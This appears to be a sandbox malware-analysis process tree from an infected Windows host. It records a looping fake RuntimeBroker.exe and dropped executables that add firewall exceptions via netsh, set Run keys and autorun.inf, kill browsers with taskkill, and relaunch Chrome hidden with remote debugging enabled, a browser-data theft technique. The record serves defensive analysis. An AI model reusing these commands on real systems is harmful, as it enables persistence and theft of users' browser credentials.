        PID:3876
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        90⤵
        
        PID:3136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zvthNoKTd5Gs.bat" "
        91⤵
        
        PID:4048
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        92⤵
        
        PID:2144
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        92⤵
        
        PID:4576
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        92⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:2440
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        92⤵
        
        PID:868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\M9lP5yBUlzbw.bat" "
        93⤵
        
        PID:1160
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        94⤵
        
        PID:5000
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        94⤵
        
        PID:1392
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        94⤵
        
        PID:3916
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        94⤵
        
        PID:5032
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JURRHoArAP6V.bat" "
        95⤵
        
        PID:924
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        96⤵
        
        PID:4792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        96⤵
        
        PID:4992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        96⤵
        
        PID:4816
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        96⤵
        
        PID:4776
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\R7tJx1g60mpm.bat" "
        97⤵
        
        PID:4140
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        98⤵
        
        PID:1860
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        98⤵
        
        PID:3136
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        98⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4184
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        98⤵
        
        PID:4992
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\bymOvfxO0oqh.bat" "
        99⤵
        
        PID:2664
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        100⤵
        
        PID:3608
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        100⤵
        
        PID:2512
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        100⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:4304
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        100⤵
        
        PID:1516
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\GkPNAlHRSDRF.bat" "
        101⤵
        
        PID:2456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        102⤵
        
        PID:4536
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        102⤵
        
        PID:1984
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        102⤵
        Runs ping.exe
        
        PID:4140
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        102⤵
        
        PID:5060
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\TdpLgvk09MQF.bat" "
        103⤵
        
        PID:3228
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        104⤵
        
        PID:3052
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        104⤵
        
        PID:2872
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        104⤵
        
        PID:5088
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        104⤵
        
        PID:3120
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\eB4iHsfRP1Ni.bat" "
        105⤵
        
        PID:2268
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        106⤵
        
        PID:4048
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        106⤵
        
        PID:2648
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        106⤵
        
        PID:732
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        106⤵
        
        PID:2620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\XljX2Wpf9dXZ.bat" "
        107⤵
        
        PID:1368
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        108⤵
        
        PID:2820
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        108⤵
        
        PID:4336
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        108⤵
        
        PID:4276
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        108⤵
        
        PID:920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EUOqE6WFsr5p.bat" "
        109⤵
        
        PID:3100
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        110⤵
        
        PID:4828
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        110⤵
        
        PID:2328
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        110⤵
        
        PID:3136
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        110⤵
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\r11mlgHVCW25.bat" "
        111⤵
        
        PID:2456
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        112⤵
        
        PID:4988
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        112⤵
        
        PID:952
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        112⤵
        
        PID:3612
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        112⤵
        
        PID:1680
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\wCOyZI7fVShW.bat" "
        113⤵
        
        PID:2896
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        114⤵
        
        PID:5084
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        114⤵
        
        PID:3768
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        114⤵
        
        PID:2724
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        114⤵
        
        PID:3224
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hay2uW5SeJCz.bat" "
        115⤵
        
        PID:1392
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        116⤵
        
        PID:232
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        116⤵
        
        PID:3600
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        116⤵
        
        PID:2348
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        116⤵
        
        PID:3664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tyiknT8wjAko.bat" "
        117⤵
        
        PID:3496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        118⤵
        
        PID:2804
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        118⤵
        
        PID:1400
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        118⤵
        
        PID:4216
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        118⤵
        
        PID:4944
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\rjQ6f7Xe1u99.bat" "
        119⤵
        
        PID:5080
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        120⤵
        
        PID:2160
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        120⤵
        
        PID:1720
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        120⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:232
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        120⤵
        
        PID:4904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\c8QWeUDgjyQA.bat" "
        121⤵
        
        PID:4796
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        122⤵
        
        PID:1364
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        122⤵
        
        PID:1860
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        122⤵
        
        PID:4660
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        122⤵
        
        PID:3084
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\UzupBJafgx9d.bat" "
        123⤵
        
        PID:1056
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        124⤵
        
        PID:4712
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        124⤵
        
        PID:3324
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        124⤵
        
        PID:3352
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        124⤵
        
        PID:2856
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2thJxbalzN3B.bat" "
        125⤵
        
        PID:3320
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        126⤵
        
        PID:4720
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        126⤵
        
        PID:1008
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        126⤵
        Runs ping.exe
        
        PID:2016
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        126⤵
        
        PID:4828
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\zpnVO8WbdUyv.bat" "
        127⤵
        
        PID:4764
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        128⤵
        
        PID:1820
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        128⤵
        
        PID:1992
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        128⤵
        
        PID:232
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        128⤵
        
        PID:1460
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\EjF5PW27sxSH.bat" "
        129⤵
        
        PID:2864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        130⤵
        
        PID:608
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        130⤵
        
        PID:776
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        130⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:1876
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        130⤵
        
        PID:2572
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\ZV5oyvfUHVMM.bat" "
        131⤵
        
        PID:3920
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        132⤵
        
        PID:4792
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        132⤵
        
        PID:3216
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        132⤵
        Runs ping.exe
        
        PID:4072
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        132⤵
        
        PID:1508
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\2ZkrCJOK0O8P.bat" "
        133⤵
        
        PID:4492
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        134⤵
        
        PID:2268
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        134⤵
        
        PID:3580
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        134⤵
        
        PID:1400
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        134⤵
        
        PID:1620
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\kzIuqqPGGrc1.bat" "
        135⤵
        
        PID:4752
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        136⤵
        
        PID:1252
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        136⤵
        
        PID:2668
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        136⤵
        System Network Configuration Discovery: Internet Connection Discovery
        Runs ping.exe
        
        PID:952
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        136⤵
        
        PID:4692
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\JuvlwTMCejIk.bat" "
        137⤵
        
        PID:4444
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        138⤵
        
        PID:3444
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        138⤵
        
        PID:3220
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        138⤵
        Runs ping.exe
        
        PID:4852
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        138⤵
        
        PID:920
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\o6MNswhpaPa7.bat" "
        139⤵
        
        PID:4200
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        140⤵
        
        PID:3560
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        140⤵
        
        PID:1912
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        140⤵
        
        PID:3472
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        140⤵
        
        PID:1364
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\AHitveo5hmrp.bat" "
        141⤵
        
        PID:4864
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        142⤵
        
        PID:2872
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        142⤵
        
        PID:1460
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        142⤵
        System Network Configuration Discovery: Internet Connection Discovery
        
        PID:2032
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        142⤵
        
        PID:772
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\hV9lgmMYbKOP.bat" "
        143⤵
        
        PID:3052
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        144⤵
        
        PID:972
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        144⤵
        
        PID:3600
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        144⤵
        
        PID:1288
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        144⤵
        
        PID:3136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\9XbcpXKoaNzs.bat" "
        145⤵
        
        PID:3364
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        146⤵
        
        PID:4332
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        146⤵
        
        PID:4512
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        146⤵
        Runs ping.exe
        
        PID:2880
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        146⤵
        
        PID:2488
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\xn9MhycjeTSF.bat" "
        147⤵
        
        PID:3496
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        148⤵
        
        PID:2136
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        148⤵
        
        PID:4840
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        148⤵
        Runs ping.exe
        
        PID:424
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        148⤵
        
        PID:3136
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\QUG7bgKuA5E7.bat" "
        149⤵
        
        PID:3428
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        150⤵
        
        PID:2092
        
        C:\Windows\system32\chcp.com
        
        chcp 65001
        150⤵
        
        PID:3364
        
        C:\Windows\system32\PING.EXE
        
        ping -n 10 localhost
        150⤵
        
        PID:3324
        
        C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe
        
        "C:\Users\Admin\AppData\Roaming\Temp\RuntimeBroker.exe"
        150⤵
        
        PID:2256
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\FQEZNP6HDf8e.bat" "
        151⤵
        
        PID:1032
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        152⤵
        
        PID:1884
- - C:\Users\Admin\AppData\Local\Temp\Files\cnct.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\cnct.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:2032
  - - C:\Users\Admin\AppData\Local\Temp\dlscord.exe
      "C:\Users\Admin\AppData\Local\Temp\dlscord.exe"
      4⤵
      Drops startup file
      Executes dropped EXE
      Adds Run key to start application
      Drops autorun.inf file
      System Location Discovery: System Language Discovery
      Suspicious behavior: GetForegroundWindowSpam
      PID:2516
    - - C:\Windows\SysWOW64\netsh.exe
        
        netsh firewall add allowedprogram "C:\Users\Admin\AppData\Local\Temp\dlscord.exe" "dlscord.exe" ENABLE
        5⤵
        Modifies Windows Firewall
        Event Triggered Execution: Netsh Helper DLL
        System Location Discovery: System Language Discovery
        
        PID:1412
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2624
- - C:\Users\Admin\AppData\Local\Temp\Files\Kerish_Doctor_2017.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Kerish_Doctor_2017.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    PID:408
  - - C:\Users\Admin\AppData\Local\Temp\is-4M4U4.tmp\Kerish_Doctor_2017.tmp
      "C:\Users\Admin\AppData\Local\Temp\is-4M4U4.tmp\Kerish_Doctor_2017.tmp" /SL5="$70242,33350357,805376,C:\Users\Admin\AppData\Local\Temp\Files\Kerish_Doctor_2017.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      System Location Discovery: System Language Discovery
      PID:1988
- - C:\Users\Admin\AppData\Local\Temp\Files\Tutorial.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\Tutorial.exe"
    3⤵
    - Executes dropped EXE
    - Suspicious use of SetThreadContext
    - System Location Discovery: System Language Discovery
    PID:4492
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe"
      4⤵
      System Location Discovery: System Language Discovery
      PID:4820
- - C:\Users\Admin\AppData\Local\Temp\Files\PsExec64.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\PsExec64.exe"
    3⤵
    - Executes dropped EXE
    PID:4672
  - - C:\Windows\System32\Conhost.exe
      \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
      4⤵
      PID:3580
- - C:\Users\Admin\AppData\Local\Temp\Files\main1.exe
    "C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"
    3⤵
    - Loads dropped DLL
    PID:3476
  - - C:\Users\Admin\AppData\Local\Temp\Files\main1.exe
      "C:\Users\Admin\AppData\Local\Temp\Files\main1.exe"
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:3132
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /F /IM chrome.exe
        5⤵
        Kills process with taskkill
        
        PID:4712
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2660
    - - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:/Program Files/Google/Chrome/Application/chrome.exe" --remote-debugging-port=9222 --profile-directory=Default --remote-allow-origins=* --window-position=10000,10000 --window-size=1,1 --disable-gpu --no-sandbox
        5⤵
        Uses browser remote debugging
        Drops file in Windows directory
        Enumerates system info in registry
        Suspicious use of FindShellTrayWindow
        
        PID:2056
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ff86a02cc40,0x7ff86a02cc4c,0x7ff86a02cc58
        6⤵
        
        PID:2840
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-sandbox --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --use-gl=angle --use-angle=swiftshader-webgl --field-trial-handle=1784,i,9376301788143256131,14028456478706764386,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1780 /prefetch:2
        6⤵
        
        PID:2868
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --no-appcompat-clear --field-trial-handle=1820,i,9376301788143256131,14028456478706764386,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1880 /prefetch:3
        6⤵
        
        PID:3136
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --no-appcompat-clear --field-trial-handle=1952,i,9376301788143256131,14028456478706764386,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2128 /prefetch:8
        6⤵
        
        PID:1488
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=2836,i,9376301788143256131,14028456478706764386,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2856 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2112
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=2860,i,9376301788143256131,14028456478706764386,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2888 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:656
      - C:\Program Files\Google\Chrome\Application\chrome.exe
        
        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --no-sandbox --remote-debugging-port=9222 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3988,i,9376301788143256131,14028456478706764386,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3904 /prefetch:1
        6⤵
        Uses browser remote debugging
        
        PID:2240
    - - C:\Windows\SYSTEM32\taskkill.exe
        
        taskkill /F /IM msedge.exe
        5⤵
        Kills process with taskkill
        
        PID:5004
      - C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        6⤵
        
        PID:2196
